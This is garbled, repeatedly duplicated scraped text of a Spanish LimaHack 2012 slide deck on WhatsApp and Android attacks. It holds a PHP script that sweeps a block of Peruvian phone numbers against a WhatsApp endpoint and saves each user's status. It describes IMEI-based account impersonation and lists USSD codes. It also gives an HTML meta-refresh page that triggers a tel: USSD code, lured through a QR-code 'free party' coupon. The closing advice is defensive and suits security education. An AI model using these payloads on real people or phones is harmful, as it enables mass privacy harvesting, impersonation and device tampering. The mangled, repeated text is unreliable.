WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 19: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/19.jpg)
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 20: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/20.jpg)
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 21: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/21.jpg)
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 22: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/22.jpg)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 23: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/23.jpg)
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
